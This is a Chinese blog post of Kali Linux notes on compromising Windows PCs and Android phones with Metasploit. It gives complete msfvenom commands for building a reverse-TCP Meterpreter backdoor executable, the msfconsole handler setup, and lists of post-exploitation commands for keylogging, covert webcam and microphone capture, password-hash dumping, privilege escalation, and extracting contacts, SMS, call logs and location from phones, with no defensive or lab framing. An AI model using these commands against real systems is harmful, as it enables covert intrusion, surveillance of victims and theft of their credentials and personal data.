Kali-MSF入侵

本文最后更新于:November 25, 2022 pm

Kali Linux 工具使用笔记。以下均是在Kali Linux 2020版本中实现。

MSF入侵电脑

使用工具

1
2
msfvenom
msfconsole

基本用法

1
2
3
4
5
6
7
8
1. 生成后门文件 hacker.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地IP LPORT=端口  -f exe -o hacker.exe //端口8888或4444等,ifconfig查看本地IP
参数:
-p payloads
-f 输出格式
-o 输入地址
-e 编码方式(msfvenom -l -encoder 可以查看能使用的编码)
-x | -k 绑定程序 (例如 –x C:\nomal.exe –k –f exe –o C:\shell.exe)
1
2
2. 给予权限
chmod 777 hacker.exe
1
2
3
4
5
6
7
8
9
3. 执行命令:
①运行msfconsole
msfconsole
②选择模块
msf > use exploit/multi/handler
set lhost 本地IP
set lport 端口号
⑤后台执行
msf exploit(handler) > exploit -z -j

这个时候等待目标打开我们的hacker.exe,打开即上钩了

1
2
3
4
5
6
4.查看上钩的用户
msf exploit(handler) > sessions
5.选择需要攻击的用户,这里选择第 1 个
msf exploit(handler) > sessions -i 1
6.执行shell
7.meterpreter > shell 
1
file>dir

进入meterpreter之后即可进行一些相关木马操作

首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
用户操作:Stdapi: User interface Commands(用户接口命令)
enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面
idletime        -->返回秒远程用户已经闲置数量
keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错
screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面
uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

摄像头:Stdapi: Webcam Commands(摄像头命令)
record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat      -->开始视频聊天(视频,对方会有弹窗)
webcam_list      -->单摄像头(查看摄像头列表)
webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)

其他命令操作
getsystem        -->获取高权限
hashdump         -->获取当前用户hash

第二种用法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
1.
msfpayload windows/meterpreter/reverse_tcp LHOST=本机IP LPORT=4444端口 x > /root/Desktop/1.exe
这样就会在桌面生成1.exe 也就是我们的木马
2.
输入msfconsole 进入msf
3.
依次输入以下命令 
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_top
set LHOST 本机Ip
//set lport 端口号
exploit
等到windows运行了1.exe后 就Ok
4.
meterpreter的命令直接-h 看帮助

MSF入侵Android

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
1.开启摄像头
  webcam_stream
2.导出手机号码
  dump_contacts
3.导出短信
  dump_sms
4.通过摄像头拍照功能
  webcam_snap
5.从目标会话发送短消息
  send_sms
6.隐秘拍照功能
  webcam_snap
7.从指定的摄像头获取快照
  webcam_snap
8.检查设备是否有根
  check_root
9.隐藏手机端木马程序图标
  hide_app_icon
10.获取通话记录
  dump_calllog
11.获取手机的当前的经纬度
  geolocate

Kali工具使用笔记

本文作者: 墨水记忆
本文链接: https://tothefor.com/DragonOne/1225656271.html
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!